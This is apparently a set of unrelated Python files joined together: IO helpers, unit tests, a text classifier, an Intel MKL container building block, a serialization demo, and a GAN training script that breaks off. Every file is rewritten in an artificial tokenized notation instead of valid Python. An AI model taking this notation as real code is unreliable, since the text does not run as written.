<import_from_stmt>typing Optional<import_from_stmt>typing cast<import_from_stmt>.inputs.input Input<import_from_stmt>.io IO<import_from_stmt>.outputs.buffered_output BufferedOutput<class_stmt>BufferedIO(IO)<block_start><def_stmt>__init__ self input:Optional[Input]=<none> decorated:bool=<false> supports_utf8:bool=<true> <arrow><none><block_start>super(BufferedIO self).__init__(input BufferedOutput(decorated=decorated supports_utf8=supports_utf8) BufferedOutput(decorated=decorated supports_utf8=supports_utf8) )<line_sep>self._output=cast(BufferedOutput self._output)<line_sep>self._error_output=cast(BufferedOutput self._error_output)<block_end><def_stmt>fetch_output self<arrow>str<block_start><return>self._output.fetch()<block_end><def_stmt>fetch_error self<arrow>str<block_start><return>self._error_output.fetch()<block_end><def_stmt>clear self<arrow><none><block_start>self._output.clear()<line_sep>self._error_output.clear()<block_end><def_stmt>clear_output self<arrow><none><block_start>self._output.clear()<block_end><def_stmt>clear_error self<arrow><none><block_start>self._error_output.clear()<block_end><def_stmt>supports_utf8 self<arrow>bool<block_start><return>self._output.supports_utf8()<block_end><def_stmt>clear_user_input self<arrow><none><block_start>self._input.stream.truncate(0)<line_sep>self._input.stream.seek(0)<block_end><def_stmt>set_user_input self user_input:str<arrow><none><block_start>self.clear_user_input()<line_sep>self._input.stream.write(user_input)<line_sep>self._input.stream.seek(0)<block_end><block_end>
<import_stmt>unittest<import_from_stmt>mock Mock<import_from_stmt>foundations_events.consumers.jobs.queued.creation_time CreationTime<class_stmt>TestCreationTime(unittest.TestCase)<block_start><def_stmt>setUp self<block_start>self._redis=Mock()<line_sep>self._consumer=CreationTime(self._redis)<block_end><def_stmt>test_call_saves_creation_time self<block_start>self._consumer.call({'job_id':'space pinball'} 34344 <none>)<line_sep>self._redis.set.assert_called_with('jobs:space pinball:creation_time' '34344')<block_end><def_stmt>test_call_saves_creation_time_different_job_id self<block_start>self._consumer.call({'job_id':'dimensional pinball'} 34344 <none>)<line_sep>self._redis.set.assert_called_with('jobs:dimensional pinball:creation_time' '34344')<block_end><def_stmt>test_call_saves_creation_time_different_time self<block_start>self._consumer.call({'job_id':'space pinball'} 99999 <none>)<line_sep>self._redis.set.assert_called_with('jobs:space pinball:creation_time' '99999')<block_end><block_end>
<def_stmt>app # pragma: no cover <block_start><return><none><block_end><def_stmt>returns_app # pragma: no cover <block_start><return>app<block_end>
<import_stmt>pytest<import_from_stmt>osp.common.utils parse_domain<line_sep>@pytest.mark.parametrize('url,domain' [# Unchanged ('test.edu' 'test.edu' ) # Strip protocol ('http://test.edu' 'test.edu' ) ('https://test.edu' 'test.edu' ) # Strip subdomains ('www.test.edu' 'test.edu' ) ('sub.test.edu' 'test.edu' ) # Strip path ('http://test.edu/syllabus.pdf' 'test.edu' ) # Strip whitespace (' http://test.edu ' 'test.edu' ) # Downcase ('WWW.TEST.EDU' 'test.edu' ) # Take second domain in embedded URLs ('https://web.archive.org/123/http:/test.edu/syllabus.pdf' 'test.edu' ) ('https://web.archive.org/123/https:/test.edu/syllabus.pdf' 'test.edu' ) ])<def_stmt>test_parse_domain url domain<block_start><assert_stmt>parse_domain(url)<eq>domain<block_end>
<import_from_stmt>sklearn.datasets fetch_20newsgroups<import_from_stmt>sklearn.pipeline Pipeline<import_from_stmt>sklearn.feature_extraction.text TfidfTransformer CountVectorizer<import_from_stmt>sklearn.naive_bayes MultinomialNB<import_stmt>numpy<as>np<import_stmt>joblib<def_stmt>fetch_data <block_start>categories=["alt.atheism" "soc.religion.christian" "comp.graphics" "sci.med"]<line_sep>twenty_train=fetch_20newsgroups(subset="train" categories=categories shuffle=<true> random_state=42)<line_sep>twenty_test=fetch_20newsgroups(subset="test" categories=categories shuffle=<true> random_state=42)<line_sep><return>twenty_train twenty_test<block_end><def_stmt>build_train_model twenty_train<block_start>text_clf=Pipeline([("vect" CountVectorizer()) ("tfidf" TfidfTransformer()) ("clf" MultinomialNB()) ])<line_sep>text_clf.fit(twenty_train.data twenty_train.target)<line_sep><return>text_clf<block_end><def_stmt>print_accuracy twenty_test text_clf<block_start>predicted=text_clf.predict(twenty_test.data)<line_sep>print(f"Accuracy: {np.mean(predicted<eq>twenty_test.target):.2f}")<block_end><def_stmt>save_model text_clf<block_start>joblib.dump(text_clf "src/model.joblib")<block_end><if_stmt>__name__<eq>"__main__"<block_start>twenty_train,twenty_test=fetch_data()<line_sep>text_clf=build_train_model(twenty_train)<line_sep>print_accuracy(twenty_test text_clf)<line_sep>save_model(text_clf)<block_end>
# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # pylint: disable=invalid-name, too-few-public-methods # pylint: disable=too-many-instance-attributes """MKL building block"""<import_from_future_stmt> absolute_import<import_from_future_stmt> unicode_literals<import_from_future_stmt> print_function<import_stmt>logging# pylint: disable=unused-import <import_stmt>hpccm.config<import_stmt>hpccm.templates.envvars<import_stmt>hpccm.templates.wget<import_from_stmt>hpccm.building_blocks.base bb_base<import_from_stmt>hpccm.building_blocks.packages packages<import_from_stmt>hpccm.common cpu_arch linux_distro<import_from_stmt>hpccm.primitives.comment comment<import_from_stmt>hpccm.primitives.environment environment<import_from_stmt>hpccm.primitives.shell shell<class_stmt>mkl(bb_base hpccm.templates.envvars hpccm.templates.wget)<block_start>"""The `mkl` building block downloads and installs the [Intel Math Kernel Library](http://software.intel.com/mkl). You must agree to the [Intel End User License Agreement](https://software.intel.com/en-us/articles/end-user-license-agreement) to use this building block. # Parameters environment: Boolean flag to specify whether the environment (`LD_LIBRARY_PATH`, `PATH`, and other variables) should be modified to include MKL. The default is True. eula: By setting this value to `True`, you agree to the [Intel End User License Agreement](https://software.intel.com/en-us/articles/end-user-license-agreement). The default value is `False`. mklvars: MKL provides an environment script (`mklvars.sh`) to set up the MKL environment. If this value is `True`, the bashrc is modified to automatically source this environment script. However, the MKL environment is not automatically available to subsequent container image build steps; the environment is available when the container image is run. To set the MKL environment in subsequent build steps you can explicitly call `source /opt/intel/mkl/bin/mklvars.sh intel64` in each build step. If this value is set to `False`, then the environment is set such that the environment is visible to both subsequent container image build steps and when the container image is run. However, the environment may differ slightly from that set by `mklvars.sh`. The default value is `True`. ospackages: List of OS packages to install prior to installing MKL. For Ubuntu, the default values are `apt-transport-https`, `ca-certificates`, `gnupg`, and `wget`. For RHEL-based Linux distributions, the default is an empty list. version: The version of MKL to install. The default value is `2020.0-088`. 
# Examples ```python mkl(eula=True, version='2018.3-051') ``` """<def_stmt>__init__ self **kwargs<block_start>"""Initialize building block"""<line_sep>super(mkl self).__init__(**kwargs)<line_sep># By setting this value to True, you agree to the # corresponding Intel End User License Agreement # (https://software.intel.com/en-us/articles/end-user-license-agreement) self.__eula=kwargs.get('eula' <false>)<line_sep>self.__mklvars=kwargs.get('mklvars' <true>)<line_sep>self.__ospackages=kwargs.get('ospackages' [])<line_sep>self.__version=kwargs.get('version' '2020.0-088')<line_sep>self.__year='2019'# Also used by 2018 and 2020 versions self.__bashrc=''# Filled in by __distro() <if_stmt>hpccm.config.g_cpu_arch<ne>cpu_arch.X86_64# pragma: no cover <block_start>logging.warning('Using mkl on a non-x86_64 processor')<block_end># Set the Linux distribution specific parameters self.__distro()<line_sep># Fill in container instructions self.__instructions()<block_end><def_stmt>__instructions self<block_start>"""Fill in container instructions"""<line_sep>self<augadd>comment('MKL version {}'.format(self.__version))<if_stmt>self.__ospackages<block_start>self<augadd>packages(ospackages=self.__ospackages)<block_end><if_stmt><not>self.__eula<block_start><raise>RuntimeError('Intel EULA was not accepted. To accept, see the documentation for this building block')<block_end>self<augadd>packages(apt_keys=['https://apt.repos.intel.com/intel-gpg-keys/GPG-PUB-KEY-INTEL-SW-PRODUCTS-{}.PUB'.format(self.__year)] apt_repositories=['deb https://apt.repos.intel.com/mkl all main'] ospackages=['intel-mkl-64bit-{}'.format(self.__version)] yum_keys=['https://yum.repos.intel.com/intel-gpg-keys/GPG-PUB-KEY-INTEL-SW-PRODUCTS-{}.PUB'.format(self.__year)] yum_repositories=['https://yum.repos.intel.com/mkl/setup/intel-mkl.repo'])<line_sep># Set the environment <if_stmt>self.__mklvars# Source the mklvars environment script when starting the # container, but the variables will not be available for any # subsequent build steps. <block_start>self<augadd>shell(commands=['echo "source /opt/intel/mkl/bin/mklvars.sh intel64" >> {}'.format(self.__bashrc)])<block_end><else_stmt># Set the environment so that it will be available to # subsequent build steps and when starting the container, # but this may miss some things relative to the mklvars # environment script. <block_start>self.environment_variables={'CPATH':'/opt/intel/mkl/include:$CPATH' 'LD_LIBRARY_PATH':'/opt/intel/mkl/lib/intel64:/opt/intel/lib/intel64:$LD_LIBRARY_PATH' 'LIBRARY_PATH':'/opt/intel/mkl/lib/intel64:/opt/intel/lib/intel64:$LIBRARY_PATH' 'MKLROOT':'/opt/intel/mkl'}<line_sep>self<augadd>environment(variables=self.environment_step())<block_end><block_end><def_stmt>__distro self<block_start>"""Based on the Linux distribution, set values accordingly. 
A user specified value overrides any defaults."""<if_stmt>hpccm.config.g_linux_distro<eq>linux_distro.UBUNTU<block_start><if_stmt><not>self.__ospackages<block_start>self.__ospackages=['apt-transport-https' 'ca-certificates' 'gnupg' 'wget']<block_end>self.__bashrc='/etc/bash.bashrc'<block_end><elif_stmt>hpccm.config.g_linux_distro<eq>linux_distro.CENTOS<block_start><if_stmt><not>self.__ospackages<block_start>self.__ospackages=[]<block_end>self.__bashrc='/etc/bashrc'<block_end><else_stmt># pragma: no cover <block_start><raise>RuntimeError('Unknown Linux distribution')<block_end><block_end><def_stmt>runtime self _from='0'<block_start>"""Generate the set of instructions to install the runtime specific components from a build in a previous stage. # Examples ```python m = mkl(...) Stage0 += m Stage1 += m.runtime() ``` """<line_sep><return>str(self)<block_end><block_end>
# coding=utf-8 # Copyright 2021 The Google Research Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Tests for ...tf3d.losses.box_prediction_losses."""<import_stmt>tensorflow<as>tf<import_from_stmt>tf3d standard_fields<import_from_stmt>tf3d.losses box_prediction_losses<class_stmt>BoxPredictionLossesTest(tf.test.TestCase)<block_start><def_stmt>_get_random_inputs self<block_start><return>{standard_fields.InputDataFields.object_rotation_matrix_voxels:tf.random.uniform([1 100 3 3] minval=-1.0 maxval=1.0 dtype=tf.float32) standard_fields.InputDataFields.object_length_voxels:tf.random.uniform([1 100 1] minval=0.1 maxval=2.0 dtype=tf.float32) standard_fields.InputDataFields.object_height_voxels:tf.random.uniform([1 100 1] minval=0.1 maxval=2.0 dtype=tf.float32) standard_fields.InputDataFields.object_width_voxels:tf.random.uniform([1 100 1] minval=0.1 maxval=2.0 dtype=tf.float32) standard_fields.InputDataFields.object_center_voxels:tf.random.uniform([1 100 3] minval=-5.0 maxval=5.0 dtype=tf.float32) standard_fields.InputDataFields.object_class_voxels:tf.random.uniform([1 100 1] minval=0 maxval=7 dtype=tf.int32) standard_fields.InputDataFields.object_instance_id_voxels:tf.random.uniform([1 100 1] minval=0 maxval=20 dtype=tf.int32) }<block_end><def_stmt>_get_empty_inputs self<block_start>inputs=self._get_random_inputs()<for_stmt>key inputs<block_start><if_stmt>key<in>inputs<block_start>tensor_shape=inputs[key].shape.as_list()<line_sep>tensor_shape[1]=0<line_sep>inputs[key]=tf.zeros(tensor_shape dtype=inputs[key].dtype)<block_end><block_end>inputs[standard_fields.InputDataFields.num_valid_voxels]=tf.constant([0] dtype=tf.int32)<line_sep><return>inputs<block_end><def_stmt>_get_dictionaries_for_distance_loss_relative self<block_start>gt_box_center=tf.reshape(tf.constant([10.0 -20.0 30.0] dtype=tf.float32) [1 1 3])<line_sep>gt_box_length=tf.reshape(tf.constant([1.0] dtype=tf.float32) [1 1 1])<line_sep>gt_box_height=tf.reshape(tf.constant([2.0] dtype=tf.float32) [1 1 1])<line_sep>gt_box_width=tf.reshape(tf.constant([3.0] dtype=tf.float32) [1 1 1])<line_sep>gt_box_r=tf.reshape(tf.eye(3 dtype=tf.float32) [1 1 3 3])<line_sep>gt_box_class=tf.reshape(tf.constant([1] dtype=tf.int32) [1 1 1])<line_sep>gt_instance_ids=tf.reshape(tf.constant([1] dtype=tf.int32) [1 1 1])<line_sep>pred_box_center1=tf.reshape(tf.constant([10.1 -20.1 30.1] dtype=tf.float32) [1 1 3])<line_sep>pred_box_length1=tf.reshape(tf.constant([1.1] dtype=tf.float32) [1 1 1])<line_sep>pred_box_height1=tf.reshape(tf.constant([2.1] dtype=tf.float32) [1 1 1])<line_sep>pred_box_width1=tf.reshape(tf.constant([3.1] dtype=tf.float32) [1 1 1])<line_sep>pred_box_r1=tf.reshape(tf.eye(3 dtype=tf.float32) [1 1 3 3])<line_sep>pred_box_center2=tf.reshape(tf.constant([10.1 -20.2 30.2] dtype=tf.float32) [1 1 3])<line_sep>pred_box_length2=tf.reshape(tf.constant([1.11] dtype=tf.float32) [1 1 1])<line_sep>pred_box_height2=tf.reshape(tf.constant([2.11] dtype=tf.float32) [1 1 1])<line_sep>pred_box_width2=tf.reshape(tf.constant([3.11] dtype=tf.float32) [1 1 
1])<line_sep>pred_box_r2=tf.reshape(tf.eye(3 dtype=tf.float32) [1 1 3 3])<line_sep>inputs={standard_fields.InputDataFields.object_rotation_matrix_voxels:gt_box_r standard_fields.InputDataFields.object_length_voxels:gt_box_length standard_fields.InputDataFields.object_height_voxels:gt_box_height standard_fields.InputDataFields.object_width_voxels:gt_box_width standard_fields.InputDataFields.object_center_voxels:gt_box_center standard_fields.InputDataFields.object_class_voxels:gt_box_class standard_fields.InputDataFields.object_instance_id_voxels:gt_instance_ids }<line_sep>outputs1={standard_fields.DetectionResultFields.object_rotation_matrix_voxels:pred_box_r1 standard_fields.DetectionResultFields.object_length_voxels:pred_box_length1 standard_fields.DetectionResultFields.object_height_voxels:pred_box_height1 standard_fields.DetectionResultFields.object_width_voxels:pred_box_width1 standard_fields.DetectionResultFields.object_center_voxels:pred_box_center1 }<line_sep>outputs2={standard_fields.DetectionResultFields.object_rotation_matrix_voxels:pred_box_r2 standard_fields.DetectionResultFields.object_length_voxels:pred_box_length2 standard_fields.DetectionResultFields.object_height_voxels:pred_box_height2 standard_fields.DetectionResultFields.object_width_voxels:pred_box_width2 standard_fields.DetectionResultFields.object_center_voxels:pred_box_center2 }<line_sep><return>inputs outputs1 outputs2<block_end><def_stmt>test_box_size_regression_loss_on_voxel_tensors_empty_inputs self<block_start>inputs=self._get_empty_inputs()<line_sep>outputs={standard_fields.DetectionResultFields.object_length_voxels:tf.zeros([1 0 3] dtype=tf.float32) standard_fields.DetectionResultFields.object_height_voxels:tf.zeros([1 0 3] dtype=tf.float32) standard_fields.DetectionResultFields.object_width_voxels:tf.zeros([1 0 3] dtype=tf.float32) }<line_sep>loss=box_prediction_losses.box_size_regression_loss_on_voxel_tensors(inputs=inputs outputs=outputs loss_type='huber')<line_sep>self.assertAllClose(loss.numpy() 0.0)<block_end><def_stmt>test_box_size_regression_loss_on_voxel_tensors_correct_prediction self<block_start>inputs=self._get_random_inputs()<line_sep>inputs[standard_fields.InputDataFields.num_valid_voxels]=tf.constant([100] dtype=tf.int32)<line_sep>outputs={standard_fields.DetectionResultFields.object_length_voxels:inputs[standard_fields.InputDataFields.object_length_voxels] standard_fields.DetectionResultFields.object_height_voxels:inputs[standard_fields.InputDataFields.object_height_voxels] standard_fields.DetectionResultFields.object_width_voxels:inputs[standard_fields.InputDataFields.object_width_voxels] }<line_sep>loss=box_prediction_losses.box_size_regression_loss_on_voxel_tensors(inputs=inputs outputs=outputs loss_type='huber')<line_sep>self.assertAllClose(loss.numpy() 0.0)<block_end><def_stmt>test_box_size_regression_loss_on_voxel_tensors_relative self<block_start>(inputs outputs1 outputs2)=self._get_dictionaries_for_distance_loss_relative()<line_sep>inputs[standard_fields.InputDataFields.num_valid_voxels]=tf.constant([1] dtype=tf.int32)<line_sep>loss1=box_prediction_losses.box_size_regression_loss_on_voxel_tensors(inputs=inputs outputs=outputs1 loss_type='huber')<line_sep>loss2=box_prediction_losses.box_size_regression_loss_on_voxel_tensors(inputs=inputs outputs=outputs2 loss_type='huber')<line_sep>self.assertGreater(loss2.numpy() loss1.numpy())<block_end><def_stmt>test_box_center_distance_loss_on_voxel_tensors_empty_inputs 
self<block_start>inputs=self._get_empty_inputs()<line_sep>outputs={standard_fields.DetectionResultFields.object_center_voxels:tf.zeros([1 0 3] dtype=tf.float32) }<line_sep>loss=box_prediction_losses.box_center_distance_loss_on_voxel_tensors(inputs=inputs outputs=outputs loss_type='huber')<line_sep>self.assertAllClose(loss.numpy() 0.0)<block_end><def_stmt>test_box_center_distance_loss_on_voxel_tensors_correct_prediction self<block_start>inputs=self._get_random_inputs()<line_sep>inputs[standard_fields.InputDataFields.num_valid_voxels]=tf.constant([100] dtype=tf.int32)<line_sep>outputs={standard_fields.DetectionResultFields.object_center_voxels:inputs[standard_fields.InputDataFields.object_center_voxels] }<line_sep>loss=box_prediction_losses.box_center_distance_loss_on_voxel_tensors(inputs=inputs outputs=outputs loss_type='huber')<line_sep>self.assertAllClose(loss.numpy() 0.0)<block_end><def_stmt>test_box_center_distance_loss_on_voxel_tensors_relative self<block_start>(inputs outputs1 outputs2)=self._get_dictionaries_for_distance_loss_relative()<line_sep>inputs[standard_fields.InputDataFields.num_valid_voxels]=tf.constant([1] dtype=tf.int32)<line_sep>loss1=box_prediction_losses.box_center_distance_loss_on_voxel_tensors(inputs=inputs outputs=outputs1 loss_type='huber')<line_sep>loss2=box_prediction_losses.box_center_distance_loss_on_voxel_tensors(inputs=inputs outputs=outputs2 loss_type='huber')<line_sep>self.assertGreater(loss2.numpy() loss1.numpy())<block_end><def_stmt>test_box_corner_distance_loss_on_voxel_tensors_empty_inputs self<block_start>inputs=self._get_empty_inputs()<line_sep>inputs[standard_fields.InputDataFields.num_valid_voxels]=tf.constant([0] dtype=tf.int32)<line_sep>outputs={standard_fields.DetectionResultFields.object_rotation_matrix_voxels:tf.zeros([1 0 3 3] dtype=tf.float32) standard_fields.DetectionResultFields.object_length_voxels:tf.zeros([1 0 1] dtype=tf.float32) standard_fields.DetectionResultFields.object_height_voxels:tf.zeros([1 0 1] dtype=tf.float32) standard_fields.DetectionResultFields.object_width_voxels:tf.zeros([1 0 1] dtype=tf.float32) standard_fields.DetectionResultFields.object_center_voxels:tf.zeros([1 0 3] dtype=tf.float32) }<line_sep>loss=box_prediction_losses.box_corner_distance_loss_on_voxel_tensors(inputs=inputs outputs=outputs loss_type='normalized_huber')<line_sep>self.assertAllClose(loss.numpy() 0.0)<block_end><def_stmt>test_box_corner_distance_loss_on_voxel_tensors_correct_prediction self<block_start>inputs=self._get_random_inputs()<line_sep>inputs[standard_fields.InputDataFields.num_valid_voxels]=tf.constant([100] dtype=tf.int32)<line_sep>outputs={standard_fields.DetectionResultFields.object_rotation_matrix_voxels:inputs[standard_fields.InputDataFields.object_rotation_matrix_voxels] standard_fields.DetectionResultFields.object_length_voxels:inputs[standard_fields.InputDataFields.object_length_voxels] standard_fields.DetectionResultFields.object_height_voxels:inputs[standard_fields.InputDataFields.object_height_voxels] standard_fields.DetectionResultFields.object_width_voxels:inputs[standard_fields.InputDataFields.object_width_voxels] standard_fields.DetectionResultFields.object_center_voxels:inputs[standard_fields.InputDataFields.object_center_voxels] }<line_sep>loss=box_prediction_losses.box_corner_distance_loss_on_voxel_tensors(inputs=inputs outputs=outputs loss_type='normalized_huber')<line_sep>self.assertAllClose(loss.numpy() 0.0)<block_end><def_stmt>test_box_corner_distance_loss_on_voxel_tensors_relative self<block_start>(inputs outputs1 
outputs2)=self._get_dictionaries_for_distance_loss_relative()<line_sep>inputs[standard_fields.InputDataFields.num_valid_voxels]=tf.constant([1] dtype=tf.int32)<line_sep>loss1=box_prediction_losses.box_corner_distance_loss_on_voxel_tensors(inputs=inputs outputs=outputs1 loss_type='normalized_huber')<line_sep>loss2=box_prediction_losses.box_corner_distance_loss_on_voxel_tensors(inputs=inputs outputs=outputs2 loss_type='normalized_huber')<line_sep>self.assertGreater(loss2.numpy() loss1.numpy())<block_end><def_stmt>test_box_corner_distance_loss_on_object_tensors_correct_prediction self<block_start>voxel_inputs=self._get_random_inputs()<line_sep>inputs={}<for_stmt>key,value standard_fields.get_input_voxel_to_object_field_mapping().items()<block_start><if_stmt>key<in>voxel_inputs<block_start>inputs[value]=[voxel_inputs[key][0 Ellipsis]]<block_end><block_end>outputs={standard_fields.DetectionResultFields.objects_rotation_matrix:inputs[standard_fields.InputDataFields.objects_rotation_matrix] standard_fields.DetectionResultFields.objects_length:inputs[standard_fields.InputDataFields.objects_length] standard_fields.DetectionResultFields.objects_height:inputs[standard_fields.InputDataFields.objects_height] standard_fields.DetectionResultFields.objects_width:inputs[standard_fields.InputDataFields.objects_width] standard_fields.DetectionResultFields.objects_center:inputs[standard_fields.InputDataFields.objects_center] }<line_sep>loss=box_prediction_losses.box_corner_distance_loss_on_object_tensors(inputs=inputs outputs=outputs loss_type='normalized_huber')<line_sep>self.assertAllClose(loss.numpy() 0.0)<block_end><def_stmt>test_box_corner_distance_loss_on_object_tensors_relative self<block_start>(voxel_inputs voxel_outputs1 voxel_outputs2)=self._get_dictionaries_for_distance_loss_relative()<line_sep>inputs={}<line_sep>outputs1={}<line_sep>outputs2={}<for_stmt>key,value standard_fields.get_input_voxel_to_object_field_mapping().items()<block_start><if_stmt>key<in>voxel_inputs<block_start>inputs[value]=[voxel_inputs[key][0 Ellipsis]]<block_end><block_end><for_stmt>key,value standard_fields.get_output_voxel_to_object_field_mapping().items()<block_start><if_stmt>key<in>voxel_outputs1<block_start>outputs1[value]=[voxel_outputs1[key][0 Ellipsis]]<block_end><block_end><for_stmt>key,value standard_fields.get_output_voxel_to_object_field_mapping().items()<block_start><if_stmt>key<in>voxel_outputs2<block_start>outputs2[value]=[voxel_outputs2[key][0 Ellipsis]]<block_end><block_end>loss1=box_prediction_losses.box_corner_distance_loss_on_object_tensors(inputs=inputs outputs=outputs1 loss_type='normalized_huber')<line_sep>loss2=box_prediction_losses.box_corner_distance_loss_on_object_tensors(inputs=inputs outputs=outputs2 loss_type='normalized_huber')<line_sep>self.assertGreater(loss2.numpy() loss1.numpy())<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>tf.test.main()<block_end>
# Copyright 2021 Pants project contributors (see CONTRIBUTORS.md). # Licensed under the Apache License, Version 2.0 (see LICENSE). <import_from_future_stmt> annotations<import_stmt>hashlib<import_stmt>pytest<import_from_stmt>pants.engine.fs EMPTY_FILE_DIGEST CreateDigest Digest FileContent FileDigest<import_from_stmt>pants.jvm.util_rules ExtractFileDigest<import_from_stmt>pants.jvm.util_rules rules<as>util_rules<import_from_stmt>pants.testutil.rule_runner QueryRule RuleRunner<line_sep>@pytest.fixture<def_stmt>rule_runner <arrow>RuleRunner<block_start><return>RuleRunner(preserve_tmpdirs=<true> rules=[*util_rules() QueryRule(FileDigest (ExtractFileDigest )) ] )<block_end><def_stmt>get_digest rule_runner:RuleRunner source_files:dict[str str]<arrow>Digest<block_start>files=[FileContent(path content.encode())<for>path,content source_files.items()]<line_sep><return>rule_runner.request(Digest [CreateDigest(files)])<block_end><def_stmt>test_extract_empty_file rule_runner:RuleRunner<arrow><none><block_start>digest=get_digest(rule_runner {"foo.txt":""})<line_sep>file_digest=rule_runner.request(FileDigest [ExtractFileDigest(digest=digest file_path="foo.txt")] )<assert_stmt>file_digest<eq>EMPTY_FILE_DIGEST<block_end><def_stmt>test_extract_nonempty_file rule_runner:RuleRunner<arrow><none><block_start>digest=get_digest(rule_runner {"foo.txt":"bar"})<line_sep>file_digest=rule_runner.request(FileDigest [ExtractFileDigest(digest=digest file_path="foo.txt")] )<line_sep>hasher=hashlib.sha256()<line_sep>hasher.update(b"bar")<assert_stmt>file_digest<eq>FileDigest(fingerprint=hasher.hexdigest() serialized_bytes_length=3)<block_end><def_stmt>test_extract_missing_file rule_runner:RuleRunner<arrow><none><block_start>digest=get_digest(rule_runner {"foo.txt":""})<with_stmt>pytest.raises(Exception match=r".*?not found in.*?")<block_start>rule_runner.request(FileDigest [ExtractFileDigest(digest=digest file_path="missing")] )<block_end><block_end><def_stmt>test_subset_with_multiple_files rule_runner:RuleRunner<arrow><none><block_start>digest=get_digest(rule_runner {"foo.txt":"" "bar.txt":""})<with_stmt>pytest.raises(Exception match=r".*?found multiple times.*?")<block_start>rule_runner.request(FileDigest [ExtractFileDigest(digest=digest file_path="*")] )<block_end><block_end>
# -*- Mode: Python -*- # vi:si:et:sw=4:sts=4:ts=4 ''' Tests related to modules. '''<import_stmt>unittest<import_stmt>common<class_stmt>SameModuleNameTestCase(common.TestCase)<block_start>''' Test that modules with the same name do not shadow each other. '''<def_stmt>test_getmodule self<block_start>self.checkMultiple('test_getmodule' ['getmodule/A/C.py' 'getmodule/B/C.py' ])<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>unittest.main()<block_end>
<import_from_stmt>mushroom_rl.core Serializable<import_stmt>torch<import_stmt>numpy<as>np<import_from_stmt>mushroom_rl.utils.parameters Parameter<class_stmt>TestClass(Serializable)<block_start><def_stmt>__init__ self value# Create some different types of variables <block_start>self._primitive_variable=value# Primitive python variable self._numpy_vector=np.array([1 2 3]<times>value)# Numpy array self._dictionary=dict(some='random' keywords=2 fill='the dictionary')# A dictionary # Building a torch object data_array=np.ones(3)<times>value<line_sep>data_tensor=torch.from_numpy(data_array)<line_sep>self._torch_object=torch.nn.Parameter(data_tensor)<line_sep># Some variables that implement the Serializable interface self._mushroom_parameter=Parameter(2.0<times>value)<line_sep>self._list_of_objects=[Parameter(i)<for>i range(value)]# This is a list! # A variable that is not important e.g. a buffer self.not_important=np.zeros(10000)<line_sep># A variable that contains a reference to another variable self._list_reference=[self._dictionary]<line_sep># Superclass constructor super().__init__()<line_sep># Here we specify how to save each component self._add_save_attr(_primitive_variable='primitive' _numpy_vector='numpy' _dictionary='pickle' _torch_object='torch' _mushroom_parameter='mushroom' # List of mushroom objects can also be saved with the 'mushroom' mode _list_of_objects='mushroom' # The '!' is to specify that we save the variable only if full_save is True not_important='numpy!' )<block_end><def_stmt>_post_load self<block_start><if_stmt>self.not_important<is><none><block_start>self.not_important=np.zeros(10000)<block_end>self._list_reference=[self._dictionary]<block_end><block_end><def_stmt>print_variables obj<block_start><for_stmt>label,var vars(obj).items()<block_start><if_stmt>label<ne>'_save_attributes'<block_start><if_stmt>isinstance(var Parameter)<block_start>print(f'{label}: Parameter({var()})')<block_end><elif_stmt>isinstance(var list)<and>isinstance(var[0] Parameter)<block_start>new_list=[f'Parameter({item()})'<for>item var]<line_sep>print(f'{label}: {new_list}')<block_end><else_stmt><block_start>print(label ': ' var)<block_end><block_end><block_end><block_end><if_stmt>__name__<eq>'__main__'# Create test object and print its variables <block_start>test_object=TestClass(1)<line_sep>print('###########################################################################################################')<line_sep>print('The test object contains the following:')<line_sep>print('-----------------------------------------------------------------------------------------------------------')<line_sep>print_variables(test_object)<line_sep># Changing the buffer test_object.not_important[0]=1<line_sep># Save the object on disk test_object.save('test.msh')<line_sep># Create another test object test_object=TestClass(2)<line_sep>print('###########################################################################################################')<line_sep>print('After overwriting the test object:')<line_sep>print('-----------------------------------------------------------------------------------------------------------')<line_sep>print_variables(test_object)<line_sep># Changing the buffer again test_object.not_important[0]=1<line_sep># Save the other test object, this time remember buffer test_object.save('test_full.msh' full_save=<true>)<line_sep># Load first test object and print its variables 
print('###########################################################################################################')<line_sep>test_object=TestClass.load('test.msh')<line_sep>print('Loading previous test object:')<line_sep>print('-----------------------------------------------------------------------------------------------------------')<line_sep>print_variables(test_object)<line_sep># Load second test object and print its variables print('###########################################################################################################')<line_sep>test_object=TestClass.load('test_full.msh')<line_sep>print('Loading previous test object:')<line_sep>print('-----------------------------------------------------------------------------------------------------------')<line_sep>print_variables(test_object)<block_end>
<import_stmt>sys<line_sep>sys.path.append("..")<import_from_stmt>gan output<line_sep>sys.modules["output"]=output<import_from_stmt>gan.doppelganger DoppelGANger<import_from_stmt>gan.util add_gen_flag normalize_per_sample<import_from_stmt>gan.load_data load_data<import_from_stmt>gan.network DoppelGANgerGenerator Discriminator AttrDiscriminator<import_stmt>os<import_stmt>tensorflow<as>tf<if_stmt>__name__<eq>"__main__"<block_start>sample_len=10<line_sep>(data_feature data_attribute data_gen_flag data_feature_outputs data_attribute_outputs)=load_data("../data/web")<line_sep>print(data_feature.shape)<line_sep>print(data_attribute.shape)<line_sep>print(data_gen_flag.shape)<line_sep>(data_feature data_attribute data_attribute_outputs real_attribute_mask)=normalize_per_sample(data_feature data_attribute data_feature_outputs data_attribute_outputs)<line_sep>print(real_attribute_mask)<line_sep>print(data_feature.shape)<line_sep>print(data_attribute.shape)<line_sep>print(len(data_attribute_outputs))<line_sep>data_feature,data_feature_outputs=add_gen_flag(data_feature data_gen_flag data_feature_outputs sample_len)<line_sep>print(data_feature.shape)<line_sep>print(len(data_feature_outputs))<line_sep>generator=DoppelGANgerGenerator(feed_back=<false> noise=<true> feature_outputs=data_feature_outputs attribute_outputs=data_attribute_outputs real_attribute_mask=real_attribute_mask 